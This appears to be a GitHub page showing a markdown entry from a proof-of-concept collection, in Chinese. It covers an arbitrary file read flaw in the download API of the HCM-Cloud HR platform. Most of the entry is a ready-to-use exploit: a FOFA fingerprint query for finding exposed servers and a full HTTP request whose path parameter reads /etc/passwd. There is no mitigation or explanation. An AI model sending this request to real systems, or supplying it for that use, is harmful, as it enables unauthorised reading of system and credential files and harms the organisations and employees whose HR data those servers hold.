Skip to content

Latest commit

 

History

History
26 lines (16 loc) · 637 Bytes

HCM-Cloud云端专业人力资源平台download任意文件读取漏洞.md

File metadata and controls

26 lines (16 loc) · 637 Bytes

HCM-Cloud云端专业人力资源平台download任意文件读取漏洞

HCM-Cloud云端专业人力资源平台download任意文件读取漏洞

fofa

icon_hash="-859381597"

poc

GET /api/model_report/file/download?index=/&ext=/etc/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Connection: close

3ccd7062314c3695db376759d9f74d02

漏洞来源